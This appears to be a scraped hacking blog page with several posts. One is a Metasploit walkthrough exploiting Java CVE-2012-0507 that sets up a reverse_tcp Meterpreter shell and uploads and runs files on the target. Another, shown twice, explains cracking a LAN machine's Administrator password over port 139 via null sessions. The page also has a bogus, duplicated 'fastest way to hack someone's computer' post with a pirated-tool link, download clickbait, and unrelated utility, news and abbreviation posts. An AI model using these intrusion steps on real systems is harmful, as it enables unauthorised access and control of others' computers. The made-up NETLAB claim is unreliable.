How to hack easily a remote computer using Metasploit? Exploiting Java vulnerability CVE-2012-0507

Whenever someone say PenTesting tool, the first thing come in our mind is MetaSploit . Today, i am going to demonstrate how to use the Metasploit tool to exploit the popular java AtomicReferenceArray Type Violation vulnerability(CVE-2012-0507).

About MetaSploit:

Metsploit is a very Powerful PenTesting Tool . Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. Very useful tool for Information Gathering, Vulnerability Scanning, Exploit Development, Client side exploits,...

Mastering the Framework: A free course from Offensive-Security
The Offensive Security Team along with several active community members, made a Free Course on the Metasploit Framework "Mastering the Framework". The course covers Information gathering, Social engineering attacks, exploit development, Advance AV avoidance and etc...

The course is available here:

Donate to HFC, Feed a Child!

The "Mastering the Framework" is free course. If you enjoyed the course, please donate to Hackers for Charity(HFC). Beyond merely providing food for children in need in East Africa, the Hackers for Charity Food Program enables children and their families to provide for themselves and become more self-sufficient by teaching them valuable agricultural skills. Every cent received is directly sent Hackers for Charity in support of their mission. Any amount, no matter how small, makes a difference; it only takes $9.00 to feed a child for a month.

You can find further details about the donation here:

Hey, where are you going?  Wait a Sec, take that course Once i demonstrate how to use the metasploit. Because, It will be hard to understand or boring, if you read those things directly.

Requirements:

• VirtualBox 
• Target OS(windows,...)
• PenTesting Distro(Backtrack )
• JRE 6(unpatched version)

is a vulnerability in the JRE due to the fact that The AtomicReferenceArray class implementation did not properly check if the array is of an expected Object[] type. A malicious Java application or applet could use this flaw to cause Java Virtual Machine(JVM) to crash or bypass Java sandbox restrictions.

Security News: This vulnerability affects Windows, Mac and Linux operating systems. Last month, Flashback malware infect more than  600,000 Mac computers by exploiting this vulnerability. Recently, The  INSS  , The  Amnesty International UK

 websites injected with malicious code that exploit the CVE-2012-0507. I am going to demonstrate this vulnerability with VirtualBox.  I have setup two Virtual Machines namely "Target" and "BT5". I have installed XP 2 in the Target and Backtrack 5 R2 in the 'BT5'.

(need help in configuring the VM?, read this:  setup PenTesting Lab).

Part I: Preparing the Target Machine:

Start the "Target" Machine.
Install the JRE 6.

Part II:Preparing the PenTesting Machine:

Now, start the BT5.

Open the Terminal and Type "msfupdate".  This will update the Metasploit Framework(MSF) with the latest exploits and Payloads. As CVE-2012-0507 is latest vulnerability, you have to update the MSF before proceeding further.

slow Internet Connection?! If you have slow internet connection, then you can download the java_atomicreferencearray module alone instead of updating all modules.
Download the  java_atomicreferencearray.rb and paste in this folder "/opt/metasploit/msf3/modules/exploits/multi/browser/"

Then, Download  CVE-2012-0507.jar  and paste in this folder "/opt/metasploit/msf3/data/exploits/"

Part III : 

Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:

Step 1:
Open the Terminal and type "msfconsole".  This will bring the Metasploit console , here you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray" . This command will use the java_atomicreferencearray.rb module for the attack.

Now type "show options" to display the which settings are available and/or required for this specific module. 

Now type "set SRVPORT 80".
and  "set URIPATH /".

Step 3: Set Payload 
Type "show payloads", this will display the list of payloads.  We are going to use the 'reverse_tcp' payload. This payload will get reverse tcp connection from the Target to PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.

set LHOST [IP_address] :  In order to get reverse connection, we have to set our IP in the LHOST.  

open the Terminal and type "ifconfig". This will display the IP info of our PenTesting Machine.  The IP will be "192.168.56.x".   For instance, let me say the ip is 192.168.56.10. 

Now  Type in the msfconsole as "set LHOST 192.168.56.10". 

Part IV: Breaching the Target Machine:

So , are you ready?! Let us break into the Target Machine. 

Step 1:

Type "exploit" in the msfconsole. This will start the reverse handler to our Machine and it will wait anyone that will connect to the our HTTP server (Eg: http://192.168.56.10). Once victim connect to our server, it will send a jar will that will exploit the CVE-2012-0507 vulnerability.

step 2: 

Open the Firefox/IE in the Target machine.  
Enter "http://192.168.56.10".
It loads nothing but exploit will run in the background.

Step 3:
Open the BT5 machine, it will display the following output:

Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control with the Target.

Step 4:Upload files
Yeeeh..! we got backdoor to the Target machine, now we can run any commands in the Target.

For Example, Typing 'sysinfo' will display the system information.

You can also upload and execute your own executable files in the Target machine.

'upload /Test.exe c:\\", this command will upload the Test.exe from the root('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe", this command will run our uploaded File in the Target.

Security Tips:

Update your JRE to the latest version.

conclusion:

I hope this article has given you a good insight into how to use MetaSploit Framework to exploit the Java vulnerability.  I hope this will help you to get into the PenTesting world..! 

So, you enjoyed the Tutorial , right?! If you have any suggestion or have doubt, please drop your comment/mail me.

For Download Click Here »

Hack computer in your LAN (Windows)

Easily Hack A Windows password.. Click Here!

Here we hack a PC somwhere in our LAN. This is a simple trick that uses open port to gain access to the target computer.The Lan hacking technique uses port 139 for the hack. On a LAN mostly the port 139 would remain open.



Today,I will write about hacking computer inside the LAN network.

This technique will be taking advantage of Port 139.

Most of the time,Port 139 will be opened.

First of all,I will do a port scanning at the target computer which is 192.168.40.128.

This computer is inside my LAN network.

I will scan it using Nmap.



I get the result and it shows Port 139 is opened up for me.

Now you will need both of these tools:
** USER2SID & SID2USER
** NetBios Auditing Tool

You can get both of them on the Internet.

After you get both of them,put them in the C:\ directory.


Easily Hack A Windows password.. Click Here! 
 
You now need to create a null session to the target computer.




Now open the Command Prompt and browse to the USER2SID & SID2USER folder.There will be 2 tools inside it,one will be USER2SID and another one will be SID2USER.

We will first using USER2SID to get the ID.



We will test against the Guest account because Guest account is a built in account.

After we get the ID,we need to do some modification on the ID.

We take the ID we get from the guest account and modified it become
"5 21 861567501 1383384898 839522115 500".

Please leave out the S-1-,leave out all the - too.



Now you will see that you get the username of the Administrator account.

In this case,the Administrator account is Administrator.

Create a text file called user.txt and the content will be the username of the Admin account.



Prepare yourself a good wordlist.



Now put both of them in the same directory with the NetBios Auditing Tool.



Now we are going to crack the Admin account for the password in order to access to the target computer.

Browse to the NetBios Auditing Tool directory.



Press on enter and the tool will run through the passlist.



In this case,I have get the password.

In order to proof that I can get access to the target computer using this password.



After you press enter,it will prompt you for the username and password.



Therefore,just input them inside the prompt and continue.



Target C drive will be on your screen.



In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 139.

The download link of the tools will be:
Download Tools.rar

We check for open 139 port by using Zenmap, you can use any other port scanners as well.

For this you need to know the IP of computers in your network which would most probably look like 192.168.xx where only 'xx' changes in range 0 to 255 and shows different IPs.

Once we get the IP of the target machine we scan it using Nmap.




Here we see that port 139 is open and ready to be hacked.

We need these two hack tools-
** USER2SID & SID2USER
** NetBios Auditing Tool

Google them on the net.

After you get both of them,put them in the C:\ directory.



Create a null session on your computer do this as follows:-



Now open the Command Prompt and browse to the USER2SID & SID2USER folders .There will be 2 tools inside it,one would be USER2SID and another one be SID2USER.

We use USER2SID to get the ID of the user on target machine.



We will test against the Guest account because Guest account is a built in account.

After we get the ID,we need to do some modification on the ID.

We use the ID which we got from the guest account and modify it-

"5 21 861567501 1383384898 839522115 500".

Please leave out the S-1-,leave out all the - too.



Now you will see that you get the username of the Administrator account.

In this case,the Administrator account is "Administrator".

Create a text file called user.txt and the content will be the username of the Admin account.



Prepare yourself a good wordlist. Or get the list of most common password on the internet.



Now put both of them in the same directory with the NetBios Auditing Tool.



Now we are going to crack the Admin account for the password in order to access to the target computer.

Browse to the NetBios Auditing Tool directory.



Press on enter and the tool will run through the passlist.



In this case,we have the password.

In order to proof that we can get access to the target computer using this password.



After you press enter,it will prompt you for the username and password.



Therefore,just input them inside the prompt and continue.



Target C drive will be pop on your screen.



In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 139.






WE recommend using the tool->
To Easily Hack A Windows password.. Click Here to download the tool! 

The download link of the tools will be:
Download Tools.rar

For Download Click Here »

Fastest way to hack into someone's computer

Updated: 10th Nov 2011

Well as I already mentioned u can hack any system as it is conected to what we call INTERNET . To connect internet a system allocates a port for communication and Data Transfer. SO here it goes all we goto do is get into that port thats hacking.

steps: -

1.Download software PORT SCANNER. Also you could use port scanner from Nettools. Download link on my blog or just Google for it
2.Copy the IP address of the victim whose port is open.
3.Download NETLAB which gives you all information including the victim ip address and area from where he is accessing internet.
4.Paste the ip of victim u found initially into NETLAB .Thats it u access his system.

Click here to download NETLAB (torrent link from piratebay.org)
" SO THAT I CAN ADD MORE STUFF LIKE THIS ,PLEASE RATE ME AND GIVE REPLIES"

For Download Click Here »

Fastest way to hack into someone's computer

Updated: 10th Nov 2011

Well as I already mentioned u can hack any system as it is conected to what we call INTERNET . To connect internet a system allocates a port for communication and Data Transfer. SO here it goes all we goto do is get into that port thats hacking.

steps: -

1.Download software PORT SCANNER. Also you could use port scanner from Nettools. Download link on my blog or just Google for it
2.Copy the IP address of the victim whose port is open.
3.Download NETLAB which gives you all information including the victim ip address and area from where he is accessing internet.
4.Paste the ip of victim u found initially into NETLAB .Thats it u access his system.

Click here to download NETLAB (torrent link from piratebay.org)
" SO THAT I CAN ADD MORE STUFF LIKE THIS ,PLEASE RATE ME AND GIVE REPLIES"

For Download Click Here »

Essential 5 utililties that your computer must have

Its a list of the 5 most essential utilities that must be present in your PC.

nCleaner - advanced system and application cleaner
Every computer needs care, and care starts with maintenance and cleanup.
Good stuff on nCleaner: Junk finder, Reg Cleaner, Free Space Shredder, Tweak manager, Startup manager and few more.

Note: because nCleaner is an advanced system app, you shouldn’t use it unless you know what you are doing. As an alternative, use cCleaner.

DriverMax - detects, downloads and installs the latest version of your computer’s drivers.
It also backs up all drivers and lets you restore them.

SmartDefrag - Defragmentation is a very important process in keeping your hard drive’s performance at maximum and bring its files together.
SmartDefrag will diagnose and optimize your machine’s hard drive while running quietly in the background.
As a prevention, this defrag app will pause itself down if the CPU raises over 40% .

Lingoes - the little sister of Babylon is a dictionary and translation freeware.
So what’s so special about this app that makes it a “must have” tool?
With Lingoes you can:

For Download Click Here »

Computer virus in space - NASA astronauts get hit

This will be shown only in post's page.
(DPA) Scientists from the National Aeronautics and Space Administration (NASA) were busy fighting a computer virus that managed to infect one of the laptop computers used by astronauts on the space station, a spokesman for the US space agency said.

Citing security concerns, NASA Wednesday declined to identify the virus, or how it made its way to the space station.

But the space news site SpaceRef.com, which first reported the infection, identified the virus as 'W32.Gammima.AG'. Referring to NASA's daily status reports, the site said the virus was probably transmitted on a flash disk drive which somehow had not been scanned.

The malware is a year-old Windows worm designed to steal information from players of 10 different online games, some of them specific to the Chinese market. Among the games are ZhengTu, HuangYi Online and Rohan.

NASA said that new anti-virus programmes had been installed on the station's computers and that the worm posed no threat. 'It was never a threat to any command-and-control or operations computer,' NASA spokesman Kelly Humphries told Computerworld magazine.

Source:- http://in.news.yahoo.com/

For Download Click Here »

Computer Related Abbreviations

Just searching the net..
and found out these cool Abbreviations...
Even i didn't knew a few....

ADSL - Asymmetric Digital Subscriber Line
AGP - Accelerated Graphics Port
ALI - Acer Labs, Incorporated
ALU - Arithmetic Logic Unit
AMD - Advanced Micro Devices
APC - American Power Conversion
ASCII - American Standard Code for Information Interchange
ASIC - Application Specific Integrated Circuit
ASPI - Advanced SCSI Programming Interface
AT - Advanced Technology
ATI - ATI Technologies Inc.
ATX - Advanced Technology Extended

--- B ---
BFG - BFG Technologies

BIOS - Basic Input Output System
BNC - Barrel Nut Connector

--- C ---
CAS - Column Address Signal
CD - Compact Disk
CDR - Compact Disk Recorder
CDRW - Compact Disk Re-Writer
CD-ROM - Compact Disk - Read Only Memory
CFM - Cubic Feet per Minute (ft?/min)
CMOS - Complementary Metal Oxide Semiconductor
CPU - Central Processing Unit
CTX - CTX Technology Corporation (Commited to Excellence)

--- D ---

DDR - Double Data Rate
DDR-SDRAM - Double Data Rate - Synchronous Dynamic Random Access Memory
DFI - DFI Inc. (Design for Innovation)
DIMM - Dual Inline Memory Module
DRAM - Dynamic Random Access Memory
DPI - Dots Per Inch
DSL - See ASDL
DVD - Digital Versatile Disc
DVD-RAM - Digital Versatile Disk - Random Access Memory

--- E ---
ECC - Error Correction Code
ECS - Elitegroup Computer Systems
EDO - Extended Data Out
EEPROM - Electrically Erasable Programmable Read-Only Memory
EPROM - Erasable Programmable Read-Only Memory
EVGA - EVGA Corporation

--- F ---
FC-PGA - Flip Chip Pin Grid Array
FDC - Floppy Disk Controller
FDD - Floppy Disk Drive
FPS - Frame Per Second
FPU - Floating Point Unit
FSAA - Full Screen Anti-Aliasing
FS - For Sale
FSB - Front Side Bus

--- G ---
GB - Gigabytes
GBps - Gigabytes per second or Gigabits per second
GDI - Graphical Device Interface
GHz - GigaHertz

--- H ---
HDD - Hard Disk Drive
HIS - Hightech Information System Limited
HP - Hewlett-Packard Development Company
HSF - Heatsink-Fan

--- I ---
IBM - International Business Machines Corporation
IC - Integrated Circuit
IDE - Integrated Drive Electronics
IFS- Item for Sale
IRQ - Interrupt Request
ISA - Industry Standard Architecture
ISO - International Standards Organization

--- J ---
JBL - JBL (Jame B. Lansing) Speakers
JVC - JVC Company of America

- K ---
Kbps - Kilobits Per Second
KBps - KiloBytes per second

--- L ---
LG - LG Electronics
LAN - Local Are Network
LCD - Liquid Crystal Display
LDT - Lightning Data Transport
LED - Light Emitting Diode

--- M ---
MAC - Media Access Control
MB ? MotherBoard or Megabyte
MBps - Megabytes Per Second
Mbps - Megabits Per Second or Megabits Per Second
MHz - MegaHertz
MIPS - Million Instructions Per Second
MMX - Multi-Media Extensions
MSI - Micro Star International

--- N ---
NAS - Network Attached Storage
NAT - Network Address Translation
NEC - NEC Corporation
NIC - Network Interface Card

--- O ---
OC - Overclock (Over Clock)
OCZ - OCZ Technology
OEM - Original Equipment Manufacturer

--- P ---
PC - Personal Computer
PCB - Printed Circuit Board
PCI - Peripheral Component Interconnect
PDA - Personal Digital Assistant
PCMCIA - Peripheral Component Microchannel Interconnect Architecture
PGA - Professional Graphics Array
PLD - Programmable Logic Device
PM - Private Message / Private Messaging
PnP - Plug 'n Play
PNY - PNY Technology
POST - Power On Self Test
PPPoA - Point-to-Point Protocol over ATM
PPPoE - Point-to-Point Protocol over Ethernet
PQI - PQI Corporation
PSU - Power Supply Unit

--- R ---
RAID - Redundant Array of Inexpensive Disks
RAM - Random Access Memory
RAMDAC - Random Access Memory Digital Analog Convertor
RDRAM - Rambus Dynamic Random Access Memory
ROM - Read Only Memory
RPM - Revolutions Per Minute

--- S ---
SASID - Self-scanned Amorphous Silicon Integrated Display
SCA - SCSI Configured Automatically
SCSI - Small Computer System Interface
SDRAM - Synchronous Dynamic Random Access Memory
SECC - Single Edge Contact Connector
SODIMM - Small Outline Dual Inline Memory Module
SPARC - Scalable Processor ArChitecture
SOHO - Small Office Home Office
SRAM - Static Random Access Memory
SSE - Streaming SIMD Extensions
SVGA - Super Video Graphics Array
S/PDIF - Sony/Philips Digital Interface

--- T ---
TB - Terabytes
TBps - Terabytes per second
Tbps - Terabits per second
TDK - TDK Electronics
TEC - Thermoelectric Cooler
TPC - TipidPC
TWAIN - Technology Without An Important Name

--- U ---
UART - Universal Asynchronous Receiver/Transmitter
USB - Universal Serial Bus
UTP - Unshieled Twisted Pair

--- V ---
VCD - Video CD
VPN - Virtual Private Network

--- W ---
WAN - Wide Area Network
WTB - Want to Buy
WYSIWYG - What You See Is What You Get

--- X ---
XGA - Extended Graphics Array
XFX - XFX Graphics, a Division of Pine
XMS - Extended Memory Specification
XT - Extended Technology

For Download Click Here »